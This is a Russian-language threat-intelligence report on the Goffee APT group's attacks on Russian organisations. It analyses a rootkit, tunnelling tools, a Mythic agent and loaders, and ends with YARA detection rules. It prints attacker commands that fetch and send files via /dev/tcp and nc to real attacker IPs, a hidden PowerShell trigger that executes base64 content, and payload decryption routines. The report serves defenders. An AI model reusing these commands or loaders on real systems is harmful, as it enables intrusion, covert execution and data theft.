Климентий Галкин
Cпециалист группы киберразведки TI-департамента экспертного центра безопасности Positive Technologies
Варвара Колоскова
Специалист группы исследования сложных угроз TI-департамента экспертного центра безопасности Positive Technologies
В течение 2024 года несколько российских организаций обращались к команде PT ESC IR для расследования инцидентов, между которыми удалось обнаружить сходство. В рамках анализа вредоносная активность инцидентов была объединена в один кластер и связана с группой Goffee, атакующей российские организации с помощью фишинга с 2022 года. В одном из инцидентов был замечен неизвестный ранее руткит под Linux — Sauropsida.
Злоумышленники использовали ранее уже известные инструменты, такие как Powertaskel и owowa. Удалось обнаружить и новые: инструменты для туннелирования трафика BindSycler и DQuic, а также новый агент Mythic.
В середине июля 2024 года одна российская компания обратилась к команде PT ESC IR за помощью в расследовании вредоносной активности. В ходе расследования было выявлено, что злоумышленники использовали давно известный инструмент PowerTaskel. Также в нем был замечен код, позволяющий расширять возможности классического PowerTaskel путем загрузки дополнительных модулей. Загрузка дополнительных модулей происходит в три этапа.
На первом этапе определяется функция Get-ProcAddress. В случае успеха на сервер отправляется сообщение Get-ProcAddress: declared или Get-ProcAddress: OK.
Далее загружается несколько вспомогательных функций, которые взяты из открытых источников. Например, для определения типа функций используется Get-DelegateType, для создания трамплина на шеллкод используется функция Emit-CallThreadStub. Также определяются WinAPI-функции, необходимые для выделения памяти, запуска шеллкода и т. п.
Также подгружается C#-метод для копирования в неуправляемую память:
using System;
namespace UnmanagedCSharp
{
public static unsafe class UnmanagedCopier
{
public static void CopyManagedToUnmanagedMemory(byte[] src, IntPtr dst, int length)
{
fixed (byte* p = src)
{
IntPtr src_ptr = (IntPtr)p;
Buffer.MemoryCopy(src_ptr.ToPointer(), dst.ToPointer(), length, length);
}
}
}
}
На третьем этапе скрипт приступает к загрузке и запуску шеллкода. Сначала на сервер отправляется сообщение о старте загрузки шеллкода в формате XML:
<?xml version="1.0" encoding="utf-8"?>
<Objects>
<Object Type="System.Collections.Hashtable">
<Property Name="Key" Type="System.String">responses</Property>
<Property Name="Value" Type="System.Object[]">
<Property Type="System.Collections.Hashtable">
<Property Name="Key" Type="System.String">task_id</Property>
<Property Name="Value" Type="System.String">UID</Property>
<Property Name="Key" Type="System.String">user_output</Property>
<Property Name="Value" Type="System.String">"[...]Uploading shellcode`n"</Property>
<Property Name="Key" Type="System.String">completed</Property>
<Property Name="Value" Type="System.Boolean">False</Property>
</Property>
</Property>
</Property>
<Property Name="Key" Type="System.String">action</Property>
<Property Name="Value" Type="System.String">post_response</Property>
</Object>
</Objects>
Сам запрос, как и все последующие, шифруется однобайтовым XOR и кодируется в base64, после чего посылаются запросы для загрузки шеллкода:
<?xml version="1.0" encoding="utf-8"?>
<Objects>
<Object Type="System.Collections.Hashtable">
<Property Name="Key" Type="System.String">responses</Property>
<Property Name="Value" Type="System.Object[]">
<Property Type="System.Collections.Hashtable">
<Property Name="Key" Type="System.String">task_id</Property>
<Property Name="Value" Type="System.String">UID</Property>
<Property Name="Key" Type="System.String">upload</Property>
<Property Name="Value" Type="System.Object[]">
<Property Name="Key" Type="System.String">file_id</Property>
<Property Name="Value" Type="System.String">"6f344b4d-b37f-4ace-a8c4-0b3150f0ceed"</Property>
<Property Name="Key" Type="System.String">chunk_num</Property>
<Property Name="Value" Type="System[.]Int32">1</Property>
<Property Name="Key" Type="System.String">chunk_size</Property>
<Property Name="Value" Type="System[.]Int32">512000</Property>
</Property>
</Property>
</Property>
<Property Name="Key" Type="System.String">action</Property>
<Property Name="Value" Type="System.String">post_response</Property>
</Object>
</Objects>
При успехе посылается сообщение "[+]Uploaded $total_bytes bytes of shellcode". Далее происходит поэтапная загрузка шеллкода в потоке текущего процесса. Каждый этап, в том числе и результат внедрения шеллкода, журналируется на сервере злоумышленников с комментарием о завершении. В результате на сервер отправляется ответ "[+]Thread invoked successfully" с идентификатором потока, в котором запущен шеллкод.
К сожалению, нам не удалось получить загружаемый код от PowerTaskel, но следы его работы остались. После первоначального доступа в систему отправлялись инструменты для открытия сервера на зараженной машине с возможностью последующей загрузки файлов.
Следующим этапом в систему загружались необходимые злоумышленникам исполняемые файлы, для скрытия которых использовался ядерный руткит Sauropsida. В зависимости от операционной системы использовались следующие наборы инструментов:
| Операционная система | Пример имени файла | Способ для загрузки файлов | Полезная нагрузка | Использование руткита Sauropsida |
|---|---|---|---|---|
| Windows | 1cv8conn.exe | Сервер Chisel, упакованный с помощью инструмента Ebowla | Mythic-агент MiRat | Нет |
| Linux | systemd-resolved | TinyShell в режиме сервера | Nim-дроппер Sliver | Да |
В случае с Windows на зараженную систему загружался агент Mythic MiRat и запускался через многоэтапный DLL Sideloading. Основной легитимный исполняемый файл с именем wsmprovhost.exe в ходе выполнения подгружает для себя WsmSvc.DLL, которая, в свою очередь, подгружает mi.dll, вызывая экспортные функции MI_Application_InitializeV1 и mi_clientFT_V1. Сами функции являются заглушками, тогда как в DllMain реализован загрузчик MiRat.
В Linux-системе было замечено использование Sliver. Поставлялся он в дроппере Infinity Loader, написанном на языке Nim. Дроппер расшифровывает Sliver и записывает в анонимный файл stukllys, используя открытый дескриптор /proc/<currentPID>/fd/<stukllys_handle>, где currentPID — это PID текущего процесса. На этот файл создается symlink /usr/libexec/resolved, который далее запускается.
Через три месяца, в октябре 2024 года, была обнаружена новая активность Goffee в атаке на другую российскую организацию. В ходе атаки использовался модифицированный вредоносный модуль owowa, применяемый для получения учетных записей пользователей, модифицированные Nim-дропперы Infinity Loader в новых форматах DLL, EXE и ELF. Конечной нагрузкой оставался Sliver.
В отличие от предыдущей версии дроппер Infinity Loader получил следующие модификации:
def decrypt(xor_key, encr, size)
for i in range(size):
xor_byte = ((xor_key + i) >> 24) ^ ((xor_key + i) >> 16) ^ ((xor_key + i) >> 8) ^ ((xor_key + i))
xor_byte &= 0xff
encr[i] ^= xor_byte
return encr
В конце 2024 года Goffee снова проявили активность. Проникнув в систему через скомпрометированную учетную запись и уязвимость одного из узлов, злоумышленники смогли получить доступ к интерпретатору bash. В системе жертвы были обнаружены команды для сбора информации об инфраструктуре и открытия удаленного соединения с серверами злоумышленников:
> base64 -d /tmp/tmp20230718 >/tmp/tmp20230719;chmod 755 /tmp/tmp/20230719;fil e/tmp/tmp/20230719
> cat < /dev/tcp/109.107.189.187/32561 > /tmp/tmp20230815;chmod 755 /tmp/tmp20230815
> nc 194.180.191.190 32561 < /lib/systemd/system/systemd-rsyslog.service
Для повышения привилегий в Linux-системах эксплуатировали уязвимость PolKit (CVE-2021-4034). Также использовались известные инструменты: RawCopy (для низкоуровневого копирования с NTFS-дисков), Impacket , Veeam Extract (для изучения резервных копий).
По окончании разведки Goffee загрузили в зараженную систему DQuic — UDP-туннель на протоколе QUIC, а на другие узлы инфраструктуры распространяли использованные ранее Chisel и TinyShell. Помимо этого, было загружено новое ВПО BindSycler, устанавливающее OpenSSH-туннель между машиной жертвы и промежуточным узлом Goffee.
В течение всего 2025 года мы наблюдали появление инструментов, причастных к данной атаке. Однако большинство из них исследовать не удалось, поскольку их расшифровка завязана на окружении целевой для каждого образца системы.
Исходя из всех обнаруженных активностей группировки Goffee удалось выявить ряд ключевых моментов:
Подробное описание перечисленных инструментов будет представлено в последующих разделах статьи.
В процессе изучение вредоносных файлов был замечен наиболее часто используемый алгоритм расшифровки, благодаря которому эти файлы были атрибутированы к одной кампании. Алгоритм похож на сильно модифицированный rol13. В честь этого он назван RolMod13, так как его отличает добавлением XOR-ключа и сдвига в зависимости от текущего индекса массива. Рассмотрим сам алгоритм:
def decrypt_module(size, ea, xor_dword):
bb = get_bytes(ea, size)
out = b''
for i in range(0, size, 4):
dword = struct.unpack("<I", bb[i:i+4])[0]
dword ^= rol((size - i) ^ xor_dword, (size - i) % 0xd, 32)
out += struct.pack("<I", dword)
return out
Алгоритм распаковки и загрузки кода в память состоит из следующих действий:
1. Сначала расшифровывают строки алгоритмом выше. Для удобства тут уже указан результат расшифровки.
В качестве параметров в функцию fnStrDecrypt передается указатель на зашифрованный массив байтов, его длина и DWORD — XOR-ключ.
2. Далее проверяется команда запуска текущего процесса. Если она не соответствует указанной в конфигурации строке, то вредонос перезапускается с заданным окружением и командной строкой из конфигурации при помощи execve, а текущий процесс на этом завершается. Изначальный интерпретатор команды при этом не меняют. В данном примере процесс запускается с параметрами /usr/sbin/rsyslogd -n -iNONE и окружением с PATH=/sbin:/bin:/usr/sbin:/usr/bin.
3. После проверки полезная нагрузка расшифровывается алгоритмом RolMod13 и загружается в память с сохранением исходных аргументов и переменных окружения. Расшифрованная полезная нагрузка является ELF-файлом со статически связанными библиотеками.
Sauropsida — это руткит, созданный на основе опенсорсного проекта под Linux Reptile. Сам руткит состоит из usermode-части и ядерного модуля. Инструмент позволяет злоумышленнику осуществлять удаленное управление системой, а также скрывать следы своего присутствия. Программно вредонос сильно не изменился, если провести сравнение с оригинальной версией. Исходя из строк внутри ВПО и специфического заголовка SAU для лог-сообщений, можно предположить, что образец назван злоумышленниками Sauropsida (что с латыни переводится как «рептилия»).
Семпл загружен в систему, накрытый модифицированным UPX. В данном случае классические байты 55 50 58 21 были заменены на A1 D8 D0 D5.
Usermode-часть представляет из себя многофункциональный инструмент: в зависимости от аргументов командной строки (или их отсутствия) он может выступать в роли загрузчика руткита, reverse shell или коннектора для управления руткитом. При первоначальной загрузке без аргументов и при запуске из-под root начинает расшифровывать kernel module алгоритмом RolMod13 и запускает модуль при помощи syscall init_module. В качестве параметров передает следующую строку:
exe_path=%s ld_sym=0x%Здесь первый параметр — это путь до исполняемого файла Sauropsida, второй параметр — адрес функции kallsyms_lookup_name.
В последней версии usermode-модуля используется следующий список ключей для различных параметров запуска: RBHSUdN:P:I:t:s:p:r:F:M:O:. Расшифруем значение данных команд:
Данные команды выполняются в модуле ядра. При каждом запуске с новыми параметрами usermode-модуль посылает ioctl характерного формата модулю ядра для общения с ним.
Как видно на рисунке выше, константы 0xA1306656 и 0xFEB18432 выступают словами-маркерами, по которым руткит ориентируется, что команда послана именно ему. Все, что заключено между этими константами, считается командой и ее параметрами. Описание команд будет ниже, в разделе «Модуль ядра».
Стоит отметить, что в случае указания параметра target ip происходит немедленная настройка reverse-shell-соединения (если указан только параметр port и установлен флаг -B, то bind shell). В данном случае обязательно указывается параметр secret: он используется в качестве сессионного ключа в соединении с C2.
Reverse и bind shell базируются на TinyShell. В нем также используются HMAC SHA-1 и AES для защиты сессии. В файл /tmp/righthere.txt записывается журнал сессии. Соединение происходит по протоколу UDP, для его реализации используются API-вызовы recvfrom и sendto.
Сам reverse shell имеет стандартные команды:
При загрузке ядерного модуля в первую очередь управление передается функции sauropsida_init. Если загрузка произошла без параметров или названия файла sauropsida_12345 (видимо, артефакт тестовых запусков), то происходит автозагрузка модуля.
Автозагрузка нужна, если запуск произошел после перезагрузки компьютера или был некорректен. При этом происходит извлечение сохраненных параметров и команд из /etc/timeinfo, которые необходимо выполнить при автозагрузке. Речь о структуре этого файла пойдет ниже.
При нормальном запуске инициализируют все необходимые хуки функций при помощи опенсорсного движка khook. Список всех перехватов, которые есть в Sauropsida, но отсутствуют в Reptile:
При этом информация о возможности перехвата таких функций, как proc_exec_connector, perf_event_fork, не распространена, это уникальная техника, используемая в данном вредоносе. В то же время у Sauropsida практически отсутствует функциональность для сокрытия содержания файлов, которая присутствует в Reptile.
Говоря про базовые перехваты, заимствованные из Reptile, стоит упомянуть про перехват функции inet_ioctl. Он используется для получения всех поступающих от пользовательского модуля команд. В ioctl проверяются все входящие сообщения и ищутся слова-маркеры. Если они найдены, значит, между двумя маркерами находится команда. Таким образом в рутките вычисляют номер передаваемой команды из usermode-части Sauropsida.
Вот список обрабатываемых команд:
Но где же C2 во всей этой истории? После создания хуков руткит запускает Port Knocking. Для всех UDP-пакетов проверяется начало: если пакет начинается с hax0r_or_not_ или mag1c, то получен магический пакет. Данный пакет ожидается на зараженной машине и содержит зашифрованную конфигурацию. В первом случае получают C2 для reverse shell, во втором — bind shell. Пакет также расшифровывается алгоритмом RolMod13.
После расшифровки переданного магического пакета десериализуют его данные. Структура пакета следующая:
(hax0r_or_not_|mag1c)?<encoded(<ip_str>\s<port_str>)>После идет перезапуск usermode-модуля c параметрами для включения reverse shell или bind shell.
Для промежуточного хранения информации используются отдельный swap-файл (по умолчанию это файл /etc/timeinfo). Иногда команда требует несколько промежуточных действий, и тогда в swap-файл записываются зашифрованные данные. Информация записывается фрагментами следующего вида:
0 1 3 3+size
|type| size| encr_data|
Данные шифруются XOR с байтом 0xE1. Классификация типов, используемых для записи данных:
DQuic представляет собой UDP bind shell, туннелирующий трафик при помощи протокола QUIC. Для реализации протокола используется открытая библиотека picoquic. В ходе сравнения открытого кода библиотеки с дизассемблированными кодом функций семпла было обнаружено, что используется достаточно старая версия данной библиотеки. Это дает нам предположить, что разработка инструмента началась еще в 2023 году.
При первом запуске после распаковки выполняется fork, и работа продолжается в дочернем процессе. Далее происходит инициализация конфига и последующая расшифровка сертификата и приватного ключа для установки соединения. Расшифровка происходит по уже известному алгоритму RolMod13.
Вначале инициализируется QUIC-контекст при помощи quic_create. В качестве параметров указывается сертификат, приватный ключ, alpn (в нашем случае udp), а также callback-функция для обработки команд. В качестве параметра этой callback-функции передается ранее заполненный конфиг. Функция quic_create принадлежит библиотеке picoquic, не будем останавливаться на ней и рассмотрим подробнее передаваемую callback-функцию. Данная функция обрабатывает стандартные события picoquic:
Если же вернуться в main, то мы увидим обработчик пакетов picoquic_packet_loop_win, который поддерживает в цикле и обрабатывает функцией loop_callback пакеты, направленные серверу по указанному bind_port. В нашем случае порт был нулевым, что означает подключение к любому свободному порту.
Внутри loop_callback происходит подключение к C2 в функции fninitClient, а также переподключение по истечении большого промежутка времени.
При подключении клиента-злоумышленника в качестве функции обработчика используется тот же qevent_handler, который и будет основным обработчиком туннеля DQuic.
Перейдем к его внутреннему устройству.
Диспетчер команд может находится в пяти состояниях (см. рис. выше). Первое состояние является интерактивным обработчиком, который управляет выполнением текстовых команд от клиента.
Режим shell имеет команду help, благодаря которой можно понять возможности DQuic:
This is an internal command shell. Supported commands are:
help - print this message
get [remote file] [local directory] - get file from the remote node
put [local file] [remote directory] - put file into the remote node
socks [action] [action params...] - SOCKS5 proxy server control, actions:
add [direction] [{IP}:port] - add proxy server on specified port, IP is optional
dir - direct proxy (from local to remote)
rev - reverse proxy (from remote to local)
remove [port] - remove proxy server on specified port
show - show all proxy servers
exit - exit internal shell
Команды get и put переводят диспетчер в состояния 2 и 3 соответственно.
При вызове команды socks add в состоянии shell диспетчер перейдет в состояние 4. Он создаст сокет для указанной прокси. Затем выполнение перейдет к состоянию 5, которое и будет отвечать за чтение-запись внутри созданной прокси.
BindSycler — это написанный на Golang shell, туннелирующий трафик при помощи протокола SSH. В зависимости от настраиваемых параметров может работать как в режиме TCP, так и UDP. Сам инструмент обфусцирован при помощи инструмента garble, в связи с чем часть имен функций отсутствует, а большинство библиотек и типов переименовано.
В начале работы BindSycler настраивает собственный конфиг:
struct config
{
bool Debug_flag; // включение режима отладки
bool KnockBack_flag; // установка соединения с сервером
strstr DialAddress; // адрес для установления соединения
strstr DialNetwork; // сеть для установления соединения (tcp/udp)
bool BindServer_flag; // запуск bind-сервера
strstr BindAddress; // адрес для привязки сервера
strstr BindNetwork; // сеть для привязки сервера (tcp/udp)
strstr BindTlsServer_Flag; // запуск bind-сервера в режиме TLS
strstr FixtureSsh_ServerKey; // ключ SSH
slice FixtureAuthorized_KeyPub; // Ключ для аутентификации
double SyclePeriod;
__int64 SycleJitterFactor;
bool TlsKnockBack_flag; // установка соединения с сервером в режиме TLS
strstr TlsDialAddress; // адрес для установления соединения в режиме TLS
strstr TlsDialNetwork; // сеть для установления соединения (tcp/udp) в режиме TLS
__int64 TlsCyclePeriod;
double TlsCycleJitterFactor;
strstr BindTlsServerAddress; // адрес для привязки сервера в режиме TLS
strstr BindTlsServerNetwork; // сеть для привязки сервера (tcp/udp) в режиме TLS
__int64 Pointer; // Не используется, вероятно дополнительные ключи для TLS
};
Значения полей FixtureSsh_ServerKey и FixtureAuthorized_KeyPub передаются в секции данных самого инструмента.
В зависимости от параметров конфигурации сети происходит инициализация bind-сервера и dial-соединение с C2. Флаги KnockBack_flag, TlsKnockBack_flag показывают, устанавливать ли соединение с сервером, в то время как BindServer_flag и BindTlsServer_Flag отвечают за формат включенного сервера. При этом эти флаги не взаимоисключаемые: BindSycler может «поднять» несколько серверов и общаться с несколькими C2. За концы туннеля отвечают две функции — binder и sycler. Первая используется для установки bind-соединения для ожидания входящих соединений. Затем она перенаправляет все в обработчик для SSH.
Вторая с заданными временными параметрами SyclePeriod и SycleJitterFactor поддерживает постоянное соединение с сервером.
Для обработки задач от сервера используется функция donkey.
Она устанавливает dial-соединение с сервером. После этого новое соединение попадает в единую функцию-обработчик — SSH Connection. Основная функция ssh во многом списана с примера из опенсорсной библиотеки ssh golang. Используются те же названия классов и та же структура вложенности, а также похожая кодовая база, хоть и расширенная под функции APT-группировки.
Поддерживаются четыре типа ssh channel:
Интересно, что при использовании в системе русской локали создаются потоки для ввода с другой кодировкой — чтобы при подключении не ломалась кодировка и названия файлов отображались верно. Это еще раз указывает на то, что злоумышленники ориентировались на российский сегмент в своих атаках.
MiRat — это агент фреймворка Mythic. Он представляет собой небольшой шелл, загружаемый в систему при помощи Sideloading.
Первое, что бросается в глаза, это использование динамического импорта на стадии загрузки первого этапа шеллкода. В качестве функции хеширования использован алгоритм FNV-1a с предварительным переносом всех строк в верхний регистр.
Затем управление передается на API CreateThread, в качестве параметра передается функция размером чуть меньше 2 МБ. Переходим в дизассемблер и находим, что один из базовых блоков функции занимает аномально большое место. Присмотревшись внимательно, можно заметить, что все это место занято побайтовым копированием шеллкода на стек, из-за чего появилась такая огромная функция. На эту область памяти вызывают VirtualProtect, после чего выполнение переходит к полезной нагрузке.
При запуске бэкдор создает мьютекс 6536bc83-5a38-4678-bfab-b2a723a86788 для того, чтобы избежать запуска нескольких экземпляров ВПО. После этого переходит к основной функциональности. Стоит заметить, что весь бэкдор состоит из одной нераздельной функции, делающей его анализ менее приятным. Для начала работы бэкдор подгружает динамически импорт, используя все тот же алгоритм FNV-1a с измененным начальным значением.
Бэкдор записывает почти каждое свое действие в файл history.hcl, оставляя запись формата %d/%d/%d %d:%d:%d %s %s, где первое — это дата, затем время, строка-комментарий и аргумент для нее. Данные не хранятся в чистом виде: перед записью в журнал каждая строка шифруются с XOR-ключом 49dd9765-c4c5-47d2-9c00-75c26a7d28b4.
При этом журнал создается по полному пути, указанному в программе. Документ создается в папке C:\\Users\\<username>\\Documents\\WSM\\history.hcl, где username использовался характерный для компьютера, на котором бэкдор запустили. Если создать по данному пути файл журнала не выйдет, то MiRat завершит свое выполнение. Из этого можно сделать вывод, что злоумышленники создали образец под атаку на конкретную организацию.
Сам MiRat является достаточно простым агентом Mythic: сперва он устанавливает защищенное соединение с C2, для идентификации жертвы генерирует случайный 20-символьный ID. После этого бэкдор ожидает команд от сервера. Сам MiRat может выполнять следующие команды:
В ходе расследований инцидентов, а также поиска дополнительных индикаторов компрометации мы обнаружили несколько цепочек атаки, которые использовала группировка Goffee. Для обнаруженных сетевых индикаторов мы составили сетевые профили, характерные для злоумышленников.
Сетевой профиль — набор уникальных (особых) признаков, обнаруженных у сетевых индикаторов группировки, на основе которого можно прогнозировать новые узлы сетевой инфраструктуры. К уникальным признакам относятся, например:
Если посмотреть на цепочку атаки с использованием HTA-файла, то можно заметить ряд закономерностей при подготовке злоумышленниками сетевой инфраструктуры. В общем контексте их можно увидеть на схеме ниже.
Рассмотрим каждый этап атаки группировки и покажем, какие особенности сетевой инфраструктуры были обнаружены и какие домены потенциально могут принадлежать Goffee. Некоторые сетевые индикаторы могут не попадать под сетевой профиль, но подтверждены в ходе расследования инцидентов.
Для фишинга группировка чаще всего использует домены зоны .ru/.рф, размещая вредоносные домены на русских IP-адресах «грязных» (то есть чаще используемых во вредоносных целях) хостингов — Aeza, VDSINA, MivoCloud и других. Для рассылки фишинговых писем используется инструмент GoPhish.
Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.
Источник: GitHub (GoPhish)
Поиск потенциально интересных и новых доменов происходил на основе следующих действий:
На основе полученных данных сформировался так называемый predicted layer, в котором желтым цветом обозначены все домены, которые, по нашему мнению, могут участвовать в атаках Goffee. На данном этапе сетевой профиль Goffee выглядит следующим образом:
| Признак | Особенность |
|---|---|
| Используемые регистратор | Namecheap |
| Используемые инструмент для фишинга | GoPhish |
| Используемые хостинги и IP-адреса | Русские IP-адреса на хостингах MivoCloud, Aeza, VDSINA, XHost |
| Домен первого уровня | .ru, .рф, .tech, .online |
Дополнительные модули для исполнения цепочки атаки доставляются с одноуровневых доменов в зоне .com/.org. Размещаются домены на уже известном наборе хостингов, на российских IP-адресах. Регистратор Namecheap редко дополняется другим — NameSilo, однако таких доменов обнаружено всего несколько.
Для поиска схожих доменов при анализе использовались те же операции, что и на предыдущем этапе: просмотр российских подсетей, тех же IP-адресов. Помимо этого, был добавлен отдельный шаг поиска схожих URL-ссылок, по которым хранилась полезная нагрузка.
Пример ссылок:
http://[REDACTED]/inhibiting/cries/aerobe/merchantman/cheeseburgers
https://[REDACTED]/page/push/turn/order
Как видно, часто ссылки строятся по принципу большой вложенности, директории называют случайными словами английского языка.
Сетевой профиль на этапе доставки вредоносного ПО выглядит так:
| Признак | Особенность |
|---|---|
| Используемые регистратор | Namecheap — чаще NameSilo — реже |
| Максимальный уровень домена | Домены второго уровня или IP-адреса |
| Используемые хостинги и IP-адреса | Русские IP-адреса на хостингах MivoCloud, Aeza, VDSINA, XHost |
| Домен первого уровня | .com, .org — чаще .host — реже |
Самая интересная часть изучения сетевых индикаторов — поиск доменов последней стадии цепочки атаки. Изучив большое количество серверов злоумышленников, найденных во время расследования инцидентов, удалось выявить ряд признаков.
| Признак | Значение |
|---|---|
| Используемые хостинги и IP-адреса | Хостинги с русскими подсетями (Aeza, MivoCloud, Beget, Stark Industries, VDSINA и др.) |
| Используемый уровень домена | Третий — чаще Второй — реже |
| Мимикрия | Российские разработки и системы Домены Unix-подобных систем Домены других систем, используемых пользователями |
| Ключевые слова | mirror, deb, app, repo, api, altlinux, astralinux, apt, pkg |
| Используемые домены первого уровня | .com Замечено использование .cloud |
| Регистратор | Namecheap |
Для поиска других индикаторов выполнялся поиск по ключевым словам, просмотр подсетей с IP-адресами на территории России.
В июле 2025 года была обнаружена новое фишинговое письмо от лица Минпромторга России, адресованное российской компании в сфере ОПК. Во вложении письма находился вредоносный архив minprom_04072025.rar с тремя файлами:
Особенность RAR-архива — использование CVE-2025-6218 для размещения ВПО в папке автозагрузки. Само ВПО являлся пропатченным загрузчиком документов XPS xpsrchvw.exe, внутри которого был Metasploit. Вредносный шеллкод устанавливает соединение и открывает reverse shell.
Обнаруженные особенности инфраструктуры Goffee в этой атаке:
Дальнейшую цепочку атаки раскрыть не удалось, так как C2 злоумышленников на момент анализа перестал быть активным.
При поиске по похожим названиям удалось найти файл с названием xpsrchvw.exe. Проанализировав его, мы обнаружили в нем модифицированную часть в виде вредоносного шеллкода, вставленного на стадии предзагрузки. Он использует ту же обфускацию и динамический резолв API, что и MiRat. В результате загрузчик скачивает вредоносный декой — Excel-файл, находящийся по ссылке hxxps:// rulebest[.]com/earthlings/baled/confidants/contraflows/hyphened.xlsx. Файл сохраняют по адресу %TEMP%\mob2025.xlsx и запускают при помощи команды:
C:\Windows\System32\cmd.exe /c start "" "%TEMP%\mob2025.xlsx"К сожалению, на момент исследования ссылка не работала, и нам не посчастливилось получить декой. После шеллкод приступает к выполнению основных функций. Загрузчик запускает cmd со следующей командой:
/c start %SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -Command "$watcher = New-object System.IO.FileSystemWatcher \"$env:TEMP\\\";$watcher.EnableRaisingEvents '= $true;$watcher.Filter=\"trigger.txt\";$watcher.NotifyFilter = [System.IO.NotifyFilters]::LastWrite;$trigger = Register-ObjectEvent $watcher \"Changed\" -Action {$trigger_content = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content \"$env:TEMP\\trigger.txt\" -Raw))); iex $trigger_content};while($true) {$null = $watcher.WaitForChanged(\"Changed\");start-sleep -s 2;};В результате его выполнения ставится триггер: при каждой записи в файл trigger.txt его содержимое расшифровывается алгоритмом base64 и тут же выполняется. Затем и шеллкод создает файл %TEMP%/trigger.txt, расшифровывает его содержание и записывает в файл.
Файл trigger.txt оказался наследником PowerModule; мы назвали его PowerPrepare. В начале работы PowerPrepare генерирует ID жертвы и зашифровывает его алгоритмом base64 с заменой некоторых символов. После этого генерируется запрос на URL следующего вида:
Здесь UID — это уникальный идентификатор самого PowerPrepare, в нашем случае он был равен 0d15a3e9-a28e-462a-a9d6-8b4bb96093b6. Ответом на данный запрос следует накрытый base64 dotnet модуль, который рефлективно загружается в систему и тут же запускается.
В июле, 22-го и 31-го числа, были обнаружены еще несколько архивов DON_AVIA_TRANS_RU.rar и Запрос_Минпромторг_22.07.rar. Архивы содержали файлы, эксплуатирующие ранее неизвестную уязвимость в WinRar версий до 7.12 включительно. Суть уязвимости — Path Traversal в функции распаковки альтернативных потоков данных для файла.
Помимо документа-приманки в архиве содержится вредоносные .lnk- и .exe-файлы, которые являются альтернативными потоками данных для PDF-файла. С помощью уязвимости по следующим путям распаковываются вредоносные файлы:
Сам исполняемый файл является простым загрузчиком на .NET, который выполняет ряд действий:
После этого полученный модуль рефлективно загружают.
В ходе последних обнаруженных атак использовались ссылки формата:
Как можно заметить, ссылки имеют пять уровень вложенности, оба домена расположены на серверах с русским IP-адресом (94.242.51.73 и 89.110.98.26 на момент исследования), зарегистрированы в Namecheap, и оба домена первого уровня — .org. Помимо этого, атрибутироваться к группировке может документ-приманка от лица Минпромторга, похожее уже было замечено 4 июля.
Анализ активности группировки Goffee показывает устойчивую и продуманную тактику, направленную на достижение долгосрочного присутствия в инфраструктуре жертв при минимальной видимости. Атаки группы уже привели к ощутимым последствиям, включая зафиксированные случаи остановки бизнес-процессов в российских организациях.
Несмотря на то что активность Goffee отслеживается более двух лет, информация о ней слабо представлена в публичном информационном поле. Это связано в первую очередь с ограниченной географией атак (они направлены преимущественно на российские организации) и фокусом группировки на скрытность, что затрудняло получение инструментов, используемых на поздних этапах развития атаки.
В результате долгого исследования удалось обнаружить новые инструменты группировки, используемые на поздних этапах атаки, такие как DQuic, MiRat, BindSycler и руткит Sauropsida. Однако не перестают быть актуальными инструменты, использованные группировкой ранее, такие как owowa и PowerTaskel.
Исследователям удалось выявить и сетевой профиль злоумышленников. Goffee используют российские IP-адресации и хостинги, вероятно ради снижения рисков обнаружения. Такая тактика помогает обходить фильтрацию трафика по геолокации, а также маскирует активность под действия внутреннего участника инфраструктуры. Чаще всего такие IP-адреса используются на промежуточных этапах — для доставки вредоносного ПО или настройки туннелирования.
Выявленный в результате исследования устойчивые технические признаки — повторяющиеся схемы упаковки, сетевой профиль группы и особенности шифрования трафика — позволяют с высокой долей уверенности связывать инциденты с данной группой и прогнозировать ее возможную активность в будущем.
import elf
rule apt_linux_ZZ_GOFFEE__Dropper__RolMod13 {
meta:
description = "Linux loader with algo RolMod13"
strings:
$code_at_00001BD7 = { 4? C1 E? 04 4? 89 ?? 4? 8B (?5 | ?D) ?? FF FF FF 4? 01 ?? 4? C7 4? 08 00 10 00 00 8B (?5 | ?D) ?? 4? 98 4? C1 E? 04 }
$code_at_00001DD2 = { 4? C1 E? 04 4? 89 ?? 4? 8B (?5 | ?D) ?? FF FF FF 4? 01 ?? 4? C7 00 19 00 00 00 }
$code_at_00001EDA = {
B? 4F EC C4 4E
89 ??
F7 E?
C1 E? 02
89 ?? 01
}
$code_at_00001EEA = { 01 ?? C1 E? 02 01 ?? 29 ?? 89 }
condition:
uint32be(0) == 0x7f454c46 and (3 of them and (for any i in (0..elf.number_of_sections): (elf.sections[i].size > 0x200000 and elf.sections[i].name == ".data")) or elf.telfhash() == "T13AB01287D731E75D98911C754C0400A70023438C772CC3000F91D850CC3440372F131C")
}
rule tool_win_ZZ_Ebowla__Dropper__Go {
meta:
description = "Go loader Ebowla with base64 payload"
strings:
$v1 = "main._Cfunc_MemoryCallEntryPoint"
$v2 = "main.build_code"
$v3 = "main.sysNativeDone"
$v4 = "main._Cfpvar_fp_MemoryDefaultGetProcAddress"
$v5 = "minus_bytes"
$v6 = "key_combos"
$v7 = "another_temp"
$v8 = "temp_encrypted_payload"
$v9 = "raw_key"
$v10 = "payload_test_hash"
$v11 = "main.walk_path"
$v12 = "temp_keycombos"
$v13 = "full_payload"
condition:
uint16(0) == 0x5A4D and 5 of ($v*)
}
rule tool_win_ZZ_InfinityLoader__Trojan {
meta:
description = "Infinity loader detect"
strings:
$code1 = { 32 54 08 10 49 C1 F9 ?? 44 31 CA 4D 89 C1 49 C1 F8 ?? 49 C1 F9 ?? 44 31 CA 44 31 C2 }
$code2 = { 48 8B 45 ?? 89 C2 48 8B 45 ?? 89 D1 48 D3 F8 44 31 C0 89 C2 48 8B 4D ?? 48 8B 45 ?? 48 01 C8 48 83 C0 ?? 88 10 }
$s1 = "Infinity"
$s2 = "crowload"
condition:
uint16be(0) == 0x4D5A and (($s1 and $code1) or ($s2 and $code2))
}